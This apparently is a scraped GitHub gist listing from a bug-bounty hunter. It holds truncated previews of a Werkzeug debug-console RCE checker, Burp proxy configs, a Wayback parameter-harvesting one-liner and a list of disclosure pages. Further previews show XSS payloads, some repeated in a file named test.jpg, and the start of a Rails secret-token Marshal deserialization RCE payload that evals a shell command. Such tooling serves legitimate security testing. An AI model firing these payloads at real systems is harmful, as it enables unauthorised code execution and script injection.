Arbaz Hussain arbazkiraak

## werkzeug_rce.py
import requests
import sys
import re
import urllib,bs4

response = requests.get('%s/console' % (sys.argv[1]))

if "Werkzeug powered traceback interpreter" not in response.text:
    print("[-] Debug is not enabled")
    sys.exit(-1)

## s3_bucket_region_checker.py
#!/usr/bin/env python
import boto3,sys,time,requests
import botocore.exceptions
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
import datetime,os

os.environ['AWS_DEFAULT_REGION'] = 'us-east-1'

s3 = boto3.resource('s3')

## foxyproxyBB.json
{
  "84kr3q1592995213323": {
    "type": 1,
    "color": "#cc883a",
    "title": "Burp",
    "active": true,
    "address": "127.0.0.1",
    "port": 8080,
    "proxyDNS": false,
    "username": "",

## bb-foxyproxy-pattern.json
{
	"30523382": {
		"className": "Proxy",
		"data": {
			"bypassFPForPAC": true,
			"color": "#f57575",
			"configUrl": "",
			"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
			"cycle": false,
			"enabled": true,

## gist:4defc9a0262c2ab115a996f3496be022
curl -s "http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey" | grep -P "=" | sed  "/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d" > Output.txt ; for i in $(cat Output.txt);do  URL="${i}"; LIST=(${URL//[=&]/=FUZZ&}); echo ${LIST} | awk -F'=' -vOFS='=' '{$NF="FUZZ"}1;' >> Passive_Collecting_URLParamter.txt ; done ; rm Output.txt ; sort -u  Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt

## send_urls_to_burp
#!/usr/bin/python3

import requests,sys
import urllib3,queue,threading
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}


urls_inp = sys.argv[1]

## bbprograms.txt
google dork -> site:.co.uk inurl:"responsible disclosure"
https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
http://www.123contactform.com/security-acknowledgements.htm
https://18f.gsa.gov/vulnerability-disclosure-policy/
https://support.1password.com/security-assessments/
https://www.23andme.com/security-report/
https://www.abnamro.com/en/footer/responsible-disclosure.html
https://www.accenture.com/us-en/company-accenture-responsible-disclosure
https://www.accredible.com/white_hat/
https://www.acquia.com/how-report-security-issue

## phantonjs-xss.html
<html>
<head></head>
<body>

<a href="javascript: alert('clicked xss link')" id="link">click me</a>
<img src="xx" onerror="alert('xss')" />
</body>
</html>

## rails-secret-token-rce.rb
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
    marshal_payload = Base64.encode64(
      "\x04\x08" +
      "o" +

## test.jpg
nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>
	import requests
	import sys
	import re
	import urllib,bs4

	response = requests.get('%s/console' % (sys.argv[1]))

	if "Werkzeug powered traceback interpreter" not in response.text:
	print("[-] Debug is not enabled")
	sys.exit(-1)
	#!/usr/bin/env python
	import boto3,sys,time,requests
	import botocore.exceptions
	from urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
	import datetime,os

	os.environ['AWS_DEFAULT_REGION'] = 'us-east-1'

	s3 = boto3.resource('s3')
	{
	"84kr3q1592995213323": {
	"type": 1,
	"color": "#cc883a",
	"title": "Burp",
	"active": true,
	"address": "127.0.0.1",
	"port": 8080,
	"proxyDNS": false,
	"username": "",
	{
	"30523382": {
	"className": "Proxy",
	"data": {
	"bypassFPForPAC": true,
	"color": "#f57575",
	"configUrl": "",
	"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
	"cycle": false,
	"enabled": true,
	#!/usr/bin/python3

	import requests,sys
	import urllib3,queue,threading
	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
	headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}
	proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}


	urls_inp = sys.argv[1]
	google dork -> site:.co.uk inurl:"responsible disclosure"
	https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
	http://www.123contactform.com/security-acknowledgements.htm
	https://18f.gsa.gov/vulnerability-disclosure-policy/
	https://support.1password.com/security-assessments/
	https://www.23andme.com/security-report/
	https://www.abnamro.com/en/footer/responsible-disclosure.html
	https://www.accenture.com/us-en/company-accenture-responsible-disclosure
	https://www.accredible.com/white_hat/
	https://www.acquia.com/how-report-security-issue
	<html>
	<head></head>
	<body>

	<a href="javascript: alert('clicked xss link')" id="link">click me</a>
	<img src="xx" onerror="alert('xss')" />
	</body>
	</html>
	#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
	require 'base64'
	require 'openssl'
	require 'optparse'
	require 'open-uri'
	SECRET_TOKEN = "SECRET HERE"
	code = "eval('`COMMAND HERE`')"
	marshal_payload = Base64.encode64(
	"\x04\x08" +
	"o" +